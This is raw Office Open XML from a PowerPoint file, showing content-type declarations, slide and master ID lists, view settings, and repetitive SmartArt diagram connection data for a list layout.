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diagrams/colors11.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+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4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+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diagrams/colors12.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+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diagrams/data7.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/diagrams/colors9.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+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heme/theme7.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout59.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quickStyle4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/diagrams/layout10.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagram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diagrams/data11.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+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diagrams/colors6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/theme/theme8.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle9.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle11.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+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theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyl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layout8.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide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diagrams/data9.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+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Layouts/slideLayout68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/diagrams/layout12.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+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diagrams/layout5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide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colors8.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/theme/theme14.xml" ContentType="application/vnd.openxmlformats-officedocument.them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quickStyle7.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout6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1" r:id="rId2"/>
    <p:sldMasterId id="2147483816" r:id="rId3"/>
    <p:sldMasterId id="2147483823" r:id="rId4"/>
    <p:sldMasterId id="2147483830" r:id="rId5"/>
    <p:sldMasterId id="2147483837" r:id="rId6"/>
    <p:sldMasterId id="2147483844" r:id="rId7"/>
    <p:sldMasterId id="2147483914" r:id="rId8"/>
    <p:sldMasterId id="2147483921" r:id="rId9"/>
    <p:sldMasterId id="2147483928" r:id="rId10"/>
    <p:sldMasterId id="2147483935" r:id="rId11"/>
    <p:sldMasterId id="2147484041" r:id="rId12"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId53"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId54"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId13"/>
    <p:sldId id="257" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="260" r:id="rId16"/>
    <p:sldId id="261" r:id="rId17"/>
    <p:sldId id="262" r:id="rId18"/>
    <p:sldId id="287" r:id="rId19"/>
    <p:sldId id="263" r:id="rId20"/>
    <p:sldId id="264" r:id="rId21"/>
    <p:sldId id="265" r:id="rId22"/>
    <p:sldId id="266" r:id="rId23"/>
    <p:sldId id="267" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="269" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="293" r:id="rId33"/>
    <p:sldId id="294"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95" r:id="rId49"/>
    <p:sldId id="285" r:id="rId50"/>
    <p:sldId id="286" r:id="rId51"/>
    <p:sldId id="258"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8" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-12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22361627-8F35-4217-8FCB-B63AE0FC9D3C}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" srcOrd="1" destOrd="0" parTransId="{721A16BF-2FDE-4873-B629-EDA500EB3C94}" sibTransId="{CDE5D969-837E-4BFD-B9DA-743101DA5C48}"/>
    <dgm:cxn modelId="{C3FD6F56-1F94-48F6-9D1D-1723105C516C}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" srcOrd="2" destOrd="0" parTransId="{B59DEF11-F438-4F1C-B855-CF52866E622C}" sibTransId="{D5563476-1867-403A-A2CC-59E00721D4ED}"/>
    <dgm:cxn modelId="{4962F10D-3BF7-4E72-8D09-1A7B998D5BD5}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A47F6BA-A157-471B-AB25-090BAA422E6A}" type="presOf" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{94E12545-92A8-48B4-B421-988AEF9D8529}"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035820D1-4E55-462F-B757-E95439861E18}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3F054DFF-A1EF-420E-943B-66A3B7595D7D}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F079C05E-5500-4D80-9D1A-7DA71AF26980}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F78078D2-2EAC-43C4-A5F6-CFFFD566A780}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2AF5DCE0-37BE-461C-A2D8-42E5107382ED}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA3DD50E-4D76-45A1-8AF6-028D26A40D75}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{80EE759F-FFB4-4317-B894-711308AA5980}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5B9C8783-F414-4BF2-BB28-BED9F1B71DB4}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C2F53875-98A4-4464-873D-05301D52C219}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9667442A-FB33-42B5-AD20-6726C9D2A03A}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{12803518-A4AE-43B5-8560-164AC8E0641A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1BFCA87B-D610-456D-BCBC-CD3861AC768A}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{5EBC383A-49FD-4EBB-908C-50739354D112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FA804808-40C5-4EA3-A472-276B15FB4516}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{72A20486-4070-4E51-AD8A-67D7B7EA56CD}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{47BEC5FF-E47C-4DBB-ABE1-4351ED80D574}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{49AA378A-C53B-4526-A0CB-68DF0B88F967}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{36F82868-6AB3-469C-8E1E-A739F93C5D9F}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A60F5772-403D-4FB5-B085-5E9533205D17}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BB69FA64-C288-425C-AD25-CC41405BAEE3}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{85EFFBF8-05B9-4223-9A3C-CD09344CCD82}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{033E8CF1-FF9E-4907-B17B-7D60DD694CC1}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0D1B92F9-519F-43BA-928F-3DEDB2FB8F52}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7045FAA-FA3F-49AE-9F3F-B4650CF1B8FF}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{16B4579D-1246-4739-8C04-6FDF6966F1B2}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data10.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163A649B-9B04-4E43-992B-1F8F0A80E722}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1"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801F0C22-AD2D-4579-8924-CB4373D64028}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" srcOrd="2" destOrd="0" parTransId="{B59DEF11-F438-4F1C-B855-CF52866E622C}" sibTransId="{D5563476-1867-403A-A2CC-59E00721D4ED}"/>
    <dgm:cxn modelId="{C6EE05B5-4059-4C0E-8787-2A25F3A7B7EB}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{62C2ABE0-D379-47D6-B1D1-18B2717C4246}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1"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6353B72A-F6BC-4548-8E4C-1B1056FAAB55}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DBF4541C-FFA6-46F6-AD7D-3BC5FF97FD82}" type="presOf" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{94E12545-92A8-48B4-B421-988AEF9D8529}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{37E9D9D7-46C6-4126-AE8C-C41D00E131C6}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6E5F6502-9B83-4DE7-9893-CED243074E52}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B546B596-816D-448E-AD27-27D613EE6F9E}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{11DFD489-C834-467D-B2F6-AA3B8ED15E04}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{32BD4F44-521A-4189-8179-EF8A278D634B}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F2729E7A-B02B-4371-9A63-3CD4EF087BD1}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{38DDB5B6-FE92-4676-B4BD-E185760BF3CA}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{12803518-A4AE-43B5-8560-164AC8E0641A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{ED919B24-4A84-4248-8254-464152C6DF3E}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{5EBC383A-49FD-4EBB-908C-50739354D112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7476A003-EA93-4B38-9455-EDF1D8E5AE20}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CA62DC6A-5B06-437A-922C-C5A1614F867F}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{613F38BA-1BD4-4FE2-831F-2A36FA124BDC}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50B8970C-A532-45B4-969C-DA30617DE624}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{60DECC58-3DAE-4762-B00E-84550FCD8960}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{765D1211-8D1C-4F9B-8418-CECC032EEB40}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{90E11E00-B4AC-43F2-94A5-0BBFAA96A0BB}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F4121CAB-9E38-4BC7-B549-78B5584A2D61}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4D3F4462-6A0B-41AA-9BED-6E8D3FDCDEF1}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0D1B92F9-519F-43BA-928F-3DEDB2FB8F52}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3B8477F9-2674-4757-AC12-DBE9752AD177}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{16B4579D-1246-4739-8C04-6FDF6966F1B2}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data11.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22361627-8F35-4217-8FCB-B63AE0FC9D3C}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" srcOrd="1" destOrd="0" parTransId="{721A16BF-2FDE-4873-B629-EDA500EB3C94}" sibTransId="{CDE5D969-837E-4BFD-B9DA-743101DA5C48}"/>
    <dgm:cxn modelId="{7663ACF1-67FC-40D9-9CB9-AB237ACB520D}" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" srcOrd="2" destOrd="0" parTransId="{B59DEF11-F438-4F1C-B855-CF52866E622C}" sibTransId="{D5563476-1867-403A-A2CC-59E00721D4ED}"/>
    <dgm:cxn modelId="{CF1E9A23-57E2-43D9-B1E8-E8933478C2CB}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0B941435-8A7D-4DC3-AA7B-93EF7597C2E9}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A5E56E70-E14E-40B1-BCA3-DFA5790477E3}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DC85BA7C-7290-4E50-AD1C-AC54DB8469BD}" type="presOf" srcId="{91E406E7-751F-41D5-9A1B-8D772397DA43}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}"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E911C2D2-B60C-445D-925F-857169887660}" type="presOf" srcId="{51C2BAA2-0FA4-4798-900A-8ADCBCA09A16}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{99C8A3BD-FF41-4DE2-9BBA-56E870CDC35B}" type="presOf" srcId="{A9228B0A-2475-44DB-B72B-DD65F47D1000}" destId="{94E12545-92A8-48B4-B421-988AEF9D8529}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BD7F89A6-B32A-4640-B757-C496033F1AEB}" type="presOf" srcId="{C5079E70-75E7-4C6A-8EF4-BB7AD0C5AC38}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{87189E18-7092-42B7-B662-9ED0BC9CCC3E}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5825644D-5BD7-4E41-97B1-0F8D09730C1A}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{4BE26352-B55B-493D-92FC-C844801B329C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3A0BD8EE-FE2A-480E-A5DF-42CC1A108E6A}" type="presParOf" srcId="{349CAE8B-4908-4B83-ABFD-AAD500FD2939}" destId="{F32DF6F7-D50B-463D-BB2B-5E1A00C17D0D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DDFC7162-9A71-4B8C-B783-DA716A763B23}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{73FC940E-908A-45B1-B16E-C1F68ABDD44D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{406E6219-6236-4165-91CB-F68E5C3A15CE}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{0C537529-28E1-4250-8B8C-8C41271CAB59}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E747C59D-A548-491B-9E31-4B5A7F701309}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{12803518-A4AE-43B5-8560-164AC8E0641A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D46B6CF9-9C21-47DD-BE90-943FC99A8CC2}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{5EBC383A-49FD-4EBB-908C-50739354D112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A4CA09CA-A674-400A-B2C1-25B275C27C8C}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{F3FD286D-FF5A-428A-91CB-EF453AFD0E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5BAA55CD-1260-495C-85F4-1001730EF16F}" type="presParOf" srcId="{5EBC383A-49FD-4EBB-908C-50739354D112}" destId="{D6683B4D-9376-4839-BC9D-FE0167CE2C75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C408E3F2-DBD1-4F2E-8E85-35214BE15E15}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{3A5A72C8-48CB-4D24-91E0-508E89871516}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CCBD59D1-F570-4844-B5A9-169DFFA6064F}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{90181CFE-3A5B-4E2E-9D46-AECB806452A9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{55FA1A80-623E-42D7-A807-9B2FCCCFF872}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{DA0F52B0-D9D2-4D15-992D-B50CA07CB3BE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7677E7E2-C180-490C-9BA8-913D5B42B8BA}" type="presParOf" srcId="{94E12545-92A8-48B4-B421-988AEF9D8529}" destId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EDEC7E7F-7D15-44E8-8403-C21638FE7F2C}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{EE8A51B4-1703-4A47-92A9-85172E36E830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6154E942-EC19-40B6-9484-5474D4BF0400}" type="presParOf" srcId="{6A00C179-8802-4126-9D6E-DBC7AFAAE412}" destId="{4A8D1DA0-F38B-45B2-85EE-2BFF80D04C8A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
